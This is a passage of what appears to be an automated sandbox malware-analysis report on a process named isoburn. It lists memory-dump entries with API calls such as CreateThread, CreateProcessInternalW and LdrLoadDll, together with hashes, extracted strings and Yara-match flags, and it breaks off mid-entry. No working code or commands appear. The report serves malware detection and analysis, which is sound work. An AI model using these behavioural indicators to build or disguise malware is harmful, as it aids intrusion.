                                                          • Instruction ID: 7761beac4718fa5b947510f8d714348e3dc856931621d8d391d62760bb438825
                                                          • Opcode Fuzzy Hash: 686a82e3c11c076053404c90c0ba8df0e5529120c16346830b6ac76891c3307b
                                                          • Instruction Fuzzy Hash: C290027621140842D1807158444464A00558BD1301FD5C015A5025654DCA558F9977A1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d3b75ed8916b4768e07caa2ef264d30ff8a1f98c98baac220d5d71e8f3267ead
                                                          • Instruction ID: 3f8ec2aa6ac9ee97dd42eeccb426536ca813f08f5074efceacd272fca21ccd4a
                                                          • Opcode Fuzzy Hash: d3b75ed8916b4768e07caa2ef264d30ff8a1f98c98baac220d5d71e8f3267ead
                                                          • Instruction Fuzzy Hash: 7390026A231400420145B558064450B04959BD63513D5C015F6416590CC6618DA55321
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 10781ee73773a80814c14df9d90ff5a4661f6805a559aebb3a15e5f3cca14095
                                                          • Instruction ID: 96f1a77fdf353f59446bffbece03cc3b87066a972f6685169fcb5770a43be2f8
                                                          • Opcode Fuzzy Hash: 10781ee73773a80814c14df9d90ff5a4661f6805a559aebb3a15e5f3cca14095
                                                          • Instruction Fuzzy Hash: A390026A221400430105B558074450700968BD5351395C021F6015550CD6618DA15121
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dc4f04b9c1daf3b5dcf549021acee7536cf3557e7a5bbb7e84a991201d015866
                                                          • Instruction ID: c9bb7ba6812cc1dbc67e8e10a2264bca7363c6ec250220e4461e97f78c5efb40
                                                          • Opcode Fuzzy Hash: dc4f04b9c1daf3b5dcf549021acee7536cf3557e7a5bbb7e84a991201d015866
                                                          • Instruction Fuzzy Hash: B690027661550442D1007158455470610558BD0201FA5C411A5424568D87D58E9165A2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6f44580129e73daebf51403468854ff30a76c03414cdec37ac17d243a95d0a62
                                                          • Instruction ID: fe198216648fa793164bf5bbad635af12ffdd6bd023ca5fb28827018e04d6f0e
                                                          • Opcode Fuzzy Hash: 6f44580129e73daebf51403468854ff30a76c03414cdec37ac17d243a95d0a62
                                                          • Instruction Fuzzy Hash: 9190026625545142D150715C44446164055ABE0201F95C021A5814594D85958D956221

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F99E25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                          • API String ID: 2422867632-999386047
                                                          • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                          • Instruction ID: ffe7755fe30e3606eb16b2e55163b0234ed885ab936a028b2564c6d0df084719
                                                          • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                          • Instruction Fuzzy Hash: F48166B0D05668CBEB20CF85C9597DEBAB1BB45308F1081D9D25C3B281C7BA1A89CF95
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                          • Instruction ID: ee6b41406f5bdc2022c71acf04365bc1e474642c29b1cda78ed85e4b5369f54f
                                                          • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                          • Instruction Fuzzy Hash: 8C4162B5A0020A9FDB00DFD8DC80DEEB7B9BF88344B108558EA05EB654D775AE05CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                          • Instruction ID: 654801ea62c72a38c96ecfa0d922c321a82654c870b9ccd3ae100245a373fbe7
                                                          • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                          • Instruction Fuzzy Hash: 85312FB5A0060A9FDB10DFD8CC809EEB7B9BF88344B108559EA05AB214D775EE058BA0
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 02FB3A5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: wininet.dll
                                                          • API String ID: 3472027048-3354682871
                                                          • Opcode ID: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                          • Instruction ID: cf936556e97def3e41f4770be30b9b5cc4cb81b710fee54a91862b136b7dad27
                                                          • Opcode Fuzzy Hash: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                          • Instruction Fuzzy Hash: BE31AEB5A00605BBDB14DFA5CC84FEBB7B9EF88754F50411DAA196B240D7706A40CBA4
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FA44D2
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                          • Instruction ID: d86fe8eeb4a7beeb6fc2c5325a21e6b7a8c8ebdf864b76eae7931a4d068c8840
                                                          • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                          • Instruction Fuzzy Hash: A0015AB5E0020DABDF10EAE1DD51FDEB3B99F04748F0081A5AE0897240F670EB18CB91
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02FA820E,00000010,?,?,?,00000044,?,00000010,02FA820E,?,?,?), ref: 02FB9813
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                          • Instruction ID: 2ac1cb80e56b4ba15a562265523605384b00ff60102b30f3ed19327402aad932
                                                          • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                          • Instruction Fuzzy Hash: BA01C0B2200208BBCB14DE9DDC80EDB77AEAF8D750F008208BA09E3241D630F8518BA4
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F99E25
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                          • Instruction ID: 0af9e41006943ab647103113d7a51007bbdef8745c86b965f448ae090b7ce6a2
                                                          • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                          • Instruction Fuzzy Hash: 7EF0657334031436E62061EE9C12FDBB38DCF85BA5F140029F70CEA2C0DAA1B84146A5
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F99E25
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                          • Instruction ID: bf642ac60101064d4cdd7e96115eb022bce05d9086aa385e1e83bf5e3f215f44
                                                          • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                          • Instruction Fuzzy Hash: BBF09B7228131437E53061A98C52FD7779DCF95B91F100019F70CEB2C0DAA5F84146F5
                                                          APIs
                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02FB8340
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Path$NameName_
                                                          • String ID:
                                                          • API String ID: 3514427675-0
                                                          • Opcode ID: 7a482533bfdaa3b503cc79b7355d131548c2471467f0cedb7971fce835a95fc5
                                                          • Instruction ID: 0e3a0518857081dbcf5556a330591a6376560f9458224e26ea3ad31b44dfd4d1
                                                          • Opcode Fuzzy Hash: 7a482533bfdaa3b503cc79b7355d131548c2471467f0cedb7971fce835a95fc5
                                                          • Instruction Fuzzy Hash: 3BF039B62106087BDA10EE69DC80EEB77ADEFC9750F008019FA08A7241D670B8118BF4
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(02FA1969,?,02FB57BB,02FA1969,02FB556F,02FB57BB,?,02FA1969,02FB556F,00001000,?,?,00000000), ref: 02FB970C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                          • Instruction ID: 97182e519e381f754ef90dcf5c03bc60ff415ec31be0f1cac9cfe1c2ee0956dc
                                                          • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                          • Instruction Fuzzy Hash: 20E06DB22042047BD714EE59DC40FEB77ADDFC9790F004019FA0CA7241D630B9108BB4
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,02FA3CE4,000000F4), ref: 02FB975C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                          • Instruction ID: e783b0ede9ad0c96d90f095683f412a42ac086875f18694d8aef6217a89e88fa
                                                          • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                          • Instruction Fuzzy Hash: BEE092722002057BEA14EF59DC85FEB37AEDFC9750F004419FA0CA7241C670B9108BB4
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02FA827C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                          • Instruction ID: 45f99fb14457c762e60fc5567df2b3b95d4e349f19055c6e8373abb25aecf3d3
                                                          • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                          • Instruction Fuzzy Hash: 08E04FB564060826FE246AA89C55FB633989B487E8F5C46A0BE1C9B2C5E7B8F9414190
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02FA1C50,02FB7EAF,02FB556F,02FA1C1D), ref: 02FA8073
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                          • Instruction ID: a5b1c4f1bafb34147865a579d139cca400eaeffcafe996400ac5e775f6563938
                                                          • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                          • Instruction Fuzzy Hash: 6EE0C2B16411006EFB10AAB89C16F96325C6B64798F0040A8B60CE7281DB70E0004524
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02FA1C50,02FB7EAF,02FB556F,02FA1C1D), ref: 02FA8073
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                          • Instruction ID: 0573bfd28f85134ecd2502726cf632efe60675ee4bdb95529f20b25ca3df2463
                                                          • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                          • Instruction Fuzzy Hash: 33D05E716402087BFA10A6BA9C16F96328D5B057E8F448064BA0CE72C2EA64F00045B5
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111), ref: 02FA0D47
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                          • Instruction ID: 4f10f34ee1f5c6020c569cf99da9eaa66e64f3544846b358e344878440c0eda1
                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                          • Instruction Fuzzy Hash: 5AD0A767B0001C35A60145846CC1DFEB71CDB846A5F004067FF08D5040DA21590206B0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6e29dafee212085108617f5471663735ceb67b63d27fb1901439ac68f27f1047
                                                          • Instruction ID: 483981a92a03de571d01ce8c45dc67838ff9d2c500e424d50e144848f5afff43
                                                          • Opcode Fuzzy Hash: 6e29dafee212085108617f5471663735ceb67b63d27fb1901439ac68f27f1047
                                                          • Instruction Fuzzy Hash: 11B02B738014C1C5DA00E3200608B1739007FD0301F16C021D3030241F0338C0C0E171
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505060030.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_50b0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                          • Instruction ID: d0a60af4084b4157790f8aa89e8a21e2ee41ec103cb36b146c87a3c63ee49774
                                                          • Opcode Fuzzy Hash: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                          • Instruction Fuzzy Hash: 3E41D67161CB0D8FE768EF68A0856FFB3E2FB55300F50052DD986C3652EAB4E8468645
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505060030.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_50b0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                          • API String ID: 0-3558027158
                                                          • Opcode ID: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                          • Instruction ID: c3c3b4b4149ab06cd0bc96b4dd68a1286058f019b656211c57bd01ada7eaba1e
                                                          • Opcode Fuzzy Hash: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                          • Instruction Fuzzy Hash: A99150F04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 2c1ec869f444ba04659fe154a9e24ae088686c4bffda0126800ab5d666b9723b
                                                          • Instruction ID: cb06ba743be5ff7320ed8c5317127c7e7c793eac44f09356b28de263597e2eae
                                                          • Opcode Fuzzy Hash: 2c1ec869f444ba04659fe154a9e24ae088686c4bffda0126800ab5d666b9723b
                                                          • Instruction Fuzzy Hash: ED51F8B5A24116BFCB20DB9889C497EF7B9BF08210B54812AE869D7681D774DE4487E0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: e5304a8c7391ee8fcaf486b43459cfea1c8bb106cd8b8dd22d8f964453958323
                                                          • Instruction ID: e7906b8042b6af9ce0863f1eaa4898955941fcd7d47a03a2237ebfe091c870c1
                                                          • Opcode Fuzzy Hash: e5304a8c7391ee8fcaf486b43459cfea1c8bb106cd8b8dd22d8f964453958323
                                                          • Instruction Fuzzy Hash: 7251E879A10646EFCB34DF5CC89097FBBBAAF44240B0489DDE4D9D7642DAB4DA408760
                                                          Strings
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052846FC
                                                          • ExecuteOptions, xrefs: 052846A0
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 05284787
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05284725
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05284655
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05284742
                                                          • Execute=1, xrefs: 05284713
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: c25268dbe9080840b25891c5ccf842e7f98a67b0cc5d5c6882326c9dddc60dae
                                                          • Instruction ID: 74a76a3ba1ebdee154a976d224db90d623865988c51ebb5a429caa037e3a83a8
                                                          • Opcode Fuzzy Hash: c25268dbe9080840b25891c5ccf842e7f98a67b0cc5d5c6882326c9dddc60dae
                                                          • Instruction Fuzzy Hash: 5E511A31760219BADF19EBA4DC49FBA77ADFF04304F080099DA19A7180DB709A46CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505060030.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_50b0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$^V^Y
                                                          • API String ID: 0-2612338985
                                                          • Opcode ID: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                          • Instruction ID: 79c862780cb4783d8a0437fbb8f4dfc37bbd172ca7b1df343bbe25911935d2ef
                                                          • Opcode Fuzzy Hash: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                          • Instruction Fuzzy Hash: E12155B044474DDBCF14DF90D459ADEBBF1FF14348F8250A8E819AE202C77582A9CB89
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
